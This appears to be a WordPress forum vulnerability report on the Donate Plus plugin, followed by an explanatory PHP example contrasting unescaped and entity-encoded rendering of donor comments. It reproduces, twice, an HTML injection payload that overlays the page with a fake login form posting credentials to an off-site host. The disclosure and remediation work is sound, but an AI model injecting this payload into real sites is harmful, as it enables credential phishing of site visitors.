I was testing this plug-in and found that I was able to embed potentially malicious HTML in the page that allowed me to take over the screen and overlay whatever content I wanted. Whoops!
    <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">
      Welcome to MyGoat!!1! Please Login wit credentialz for major nigerian cash<br>
      <form name="login" action="http://aspectsecurity.com">
        <table>
          <tr><td>Username: </td><td><input type="text" name="username"/></td></tr>
          <tr><td>Password:</td><td><input type="text" name="password"/></td></tr>
          <tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
        </table>
      </form>
      <img</div>
I inserted this HTML through the WordPress backend, but assume there is no validation to prevent this.
- The topic ‘[Plugin: Donate Plus] Potentially Malicious HTML allowed in donor comments’ is closed to new replies.
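The rendering defect behind this report, shown as an added example that is not Donate Plus code or the reporter's: a donor-comment renderer in its vulnerable form (comment concatenated into the page as markup) beside the hardened form (comment entity-encoded so the browser shows it as text). The script is stand-alone PHP, so `htmlspecialchars()` stands in for WordPress's `esc_html()`; the comment text is constructed from the payload in the report, and the donor name and function names are this example's own.

```php
<?php
// Added example, not Donate Plus code: a donor-comment renderer in its vulnerable
// and hardened forms. Runs stand-alone (php -f), so htmlspecialchars() stands in
// for WordPress's esc_html(); the comment text is constructed from the report above.

// Constructed donor comment: the overlay payload from the report, abbreviated.
const DONOR_COMMENT = '<div style="position: absolute; left: 0px; top: 0px; '
    . 'width: 1900px; height: 1300px; z-index: 1000; background-color:white;">'
    . 'Welcome to MyGoat!!1! <form name="login" action="http://aspectsecurity.com">'
    . 'Username: <input type="text" name="username"/> '
    . 'Password: <input type="text" name="password"/>'
    . '<input type="submit" value="Login"/></form><img</div>';

// Vulnerable: the stored comment is concatenated straight into the page markup.
// The browser parses the donor's <div> and <form>, so an absolutely positioned,
// high z-index block covers the real page and the fake login posts to a third party.
function render_comment_vulnerable(string $donor, string $comment): string
{
    return "<li><strong>$donor</strong> wrote: $comment</li>";
}

// Hardened: treat the comment as text, never as markup. Entity-encoding '<', '>',
// '&' and both quote characters makes the browser display the payload literally.
// This is what esc_html() does in WordPress; if limited formatting must be allowed,
// use wp_kses() with an explicit tag/attribute allowlist rather than string filtering.
function render_comment_escaped(string $donor, string $comment): string
{
    $safe_donor   = htmlspecialchars($donor,   ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $safe_comment = htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<li><strong>$safe_donor</strong> wrote: $safe_comment</li>";
}

// Quick check against rendered output: after escaping, the only tags left in the
// fragment are the ones the template itself emitted (<li>, <strong>).
function contains_donor_markup(string $html): bool
{
    return stripos($html, '<div') !== false || stripos($html, '<form') !== false;
}

$vulnerable = render_comment_vulnerable('Mallory', DONOR_COMMENT);
$hardened   = render_comment_escaped('Mallory', DONOR_COMMENT);

if (!contains_donor_markup($vulnerable)) {
    fwrite(STDERR, "unexpected: vulnerable renderer did not emit donor markup\n");
    exit(1);
}
if (contains_donor_markup($hardened)
    || !str_contains($hardened, '&lt;div style=&quot;position: absolute;')) {
    fwrite(STDERR, "hardened renderer leaked donor markup\n");
    exit(1);
}

echo "Vulnerable output:\n$vulnerable\n\nHardened output:\n$hardened\n";
```

Note that the payload in the report contains no script at all: a `<div>` with `position: absolute` and a large `z-index`, plus a `<form>` whose `action` points off-site, is enough to cover the page and phish credentials. A Content-Security-Policy that blocks inline script therefore does not mitigate it; encoding the comment on output (or passing it through an allowlist sanitizer such as `wp_kses()` that strips `style` and `action` attributes) is what closes it.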